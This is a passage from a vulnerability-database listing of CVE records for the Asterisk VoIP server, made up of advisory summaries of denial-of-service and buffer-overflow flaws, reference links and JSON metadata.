              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-03-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.15 before 1.8.15-cert5 and 11.6 before 11.6-cert2, when chan_sip has a certain configuration, allows remote authenticated users to cause a denial of service (channel and file descriptor consumption) via an INVITE request with a (1) Session-Expires or (2) Min-SE header with a malformed or invalid value."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-04-18T18:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "66094",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/66094"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-002.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23373"
        },
        {
          "name": "MDVSA-2014:078",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
        },
        {
          "name": "FEDORA-2014-3762",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
        },
        {
          "name": "FEDORA-2014-3779",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2287",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.15 before 1.8.15-cert5 and 11.6 before 11.6-cert2, when chan_sip has a certain configuration, allows remote authenticated users to cause a denial of service (channel and file descriptor consumption) via an INVITE request with a (1) Session-Expires or (2) Min-SE header with a malformed or invalid value."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "66094",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/66094"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-002.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-23373",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23373"
            },
            {
              "name": "MDVSA-2014:078",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
            },
            {
              "name": "FEDORA-2014-3762",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
            },
            {
              "name": "FEDORA-2014-3779",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-2287",
    "datePublished": "2014-04-18T19:00:00",
    "dateReserved": "2014-03-05T00:00:00",
    "dateUpdated": "2024-08-06T10:06:00.091Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-7550

Vulnerability from cvelistv5

Published

2019-05-23 18:23

Modified

2024-08-06 02:04

Severity ?

Summary

asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote).

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2016-006.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T02:04:55.340Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote)."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-05-23T18:23:59",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-7550",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-006.html",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-7550",
    "datePublished": "2019-05-23T18:23:59",
    "dateReserved": "2016-09-09T00:00:00",
    "dateUpdated": "2024-08-06T02:04:55.340Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-5977

Vulnerability from cvelistv5

Published

2013-01-04 15:00

Modified

2024-08-06 21:21

Severity ?

Summary

Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.

References

▼	URL	Tags
	http://www.debian.org/security/2013/dsa-2605	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-20175	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2012-015	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T21:21:28.317Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "DSA-2605",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2013/dsa-2605"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20175"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-015"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-01-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-02-02T10:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "DSA-2605",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2013/dsa-2605"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20175"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-015"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-5977",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "DSA-2605",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2013/dsa-2605"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-20175",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20175"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-015",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-015"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-5977",
    "datePublished": "2013-01-04T15:00:00",
    "dateReserved": "2012-11-21T00:00:00",
    "dateUpdated": "2024-08-06T21:21:28.317Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-5641

Vulnerability from cvelistv5

Published

2013-09-09 17:00

Modified

2024-08-06 17:15

Severity ?

Summary

The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.

References

▼	URL	Tags
	http://secunia.com/advisories/54534	third-party-advisory, x_refsource_SECUNIA
	http://osvdb.org/96691	vdb-entry, x_refsource_OSVDB
	http://seclists.org/bugtraq/2013/Aug/185	mailing-list, x_refsource_BUGTRAQ
	http://secunia.com/advisories/54617	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2013/dsa-2749	vendor-advisory, x_refsource_DEBIAN
	http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html	mailing-list, x_refsource_BUGTRAQ
	http://downloads.asterisk.org/pub/security/AST-2013-004.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/62021	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id/1028956	vdb-entry, x_refsource_SECTRACK
	https://issues.asterisk.org/jira/browse/ASTERISK-21064	x_refsource_CONFIRM
	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223	vendor-advisory, x_refsource_MANDRIVA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:15:21.479Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "54534",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/54534"
          },
          {
            "name": "96691",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/96691"
          },
          {
            "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://seclists.org/bugtraq/2013/Aug/185"
          },
          {
            "name": "54617",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/54617"
          },
          {
            "name": "DSA-2749",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2013/dsa-2749"
          },
          {
            "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2013-004.html"
          },
          {
            "name": "62021",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/62021"
          },
          {
            "name": "1028956",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1028956"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-21064"
          },
          {
            "name": "MDVSA-2013:223",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-08-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel.  NOTE: some of these details are obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-09-12T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "54534",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/54534"
        },
        {
          "name": "96691",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/96691"
        },
        {
          "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://seclists.org/bugtraq/2013/Aug/185"
        },
        {
          "name": "54617",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/54617"
        },
        {
          "name": "DSA-2749",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2013/dsa-2749"
        },
        {
          "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2013-004.html"
        },
        {
          "name": "62021",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/62021"
        },
        {
          "name": "1028956",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1028956"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-21064"
        },
        {
          "name": "MDVSA-2013:223",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5641",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel.  NOTE: some of these details are obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "54534",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/54534"
            },
            {
              "name": "96691",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/96691"
            },
            {
              "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
              "refsource": "BUGTRAQ",
              "url": "http://seclists.org/bugtraq/2013/Aug/185"
            },
            {
              "name": "54617",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/54617"
            },
            {
              "name": "DSA-2749",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2013/dsa-2749"
            },
            {
              "name": "20130827 AST-2013-004: Remote Crash From Late Arriving SIP ACK With SDP",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2013-08/0175.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2013-004.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2013-004.html"
            },
            {
              "name": "62021",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/62021"
            },
            {
              "name": "1028956",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1028956"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-21064",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-21064"
            },
            {
              "name": "MDVSA-2013:223",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:223"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-5641",
    "datePublished": "2013-09-09T17:00:00",
    "dateReserved": "2013-08-28T00:00:00",
    "dateUpdated": "2024-08-06T17:15:21.479Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-15639

Vulnerability from cvelistv5

Published

2019-09-09 12:50

Modified

2024-08-05 00:56

Severity ?

Summary

main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario.

References

▼	URL	Tags
	http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2019-005.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:56:22.040Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2019-005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-09-09T12:50:30",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2019-005.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-15639",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2019-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2019-005.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-15639",
    "datePublished": "2019-09-09T12:50:30",
    "dateReserved": "2019-08-26T00:00:00",
    "dateUpdated": "2024-08-05T00:56:22.040Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0761

Vulnerability from cvelistv5

Published

2003-09-12 04:00

Modified

2024-09-17 03:23

Severity ?

Summary

Buffer overflow in the get_msg_text of chan_sip.c in the Session Initiation Protocol (SIP) protocol implementation for Asterisk releases before August 15, 2003, allows remote attackers to execute arbitrary code via certain (1) MESSAGE or (2) INFO requests.

References

▼	URL	Tags
	http://www.atstake.com/research/advisories/2003/a090403-1.txt	vendor-advisory, x_refsource_ATSTAKE

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:05:12.487Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "A090403-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_ATSTAKE",
              "x_transferred"
            ],
            "url": "http://www.atstake.com/research/advisories/2003/a090403-1.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the get_msg_text of chan_sip.c in the Session Initiation Protocol (SIP) protocol implementation for Asterisk releases before August 15, 2003, allows remote attackers to execute arbitrary code via certain (1) MESSAGE or (2) INFO requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2003-09-12T04:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "A090403-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_ATSTAKE"
          ],
          "url": "http://www.atstake.com/research/advisories/2003/a090403-1.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0761",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in the get_msg_text of chan_sip.c in the Session Initiation Protocol (SIP) protocol implementation for Asterisk releases before August 15, 2003, allows remote attackers to execute arbitrary code via certain (1) MESSAGE or (2) INFO requests."
            }
          ]
        },
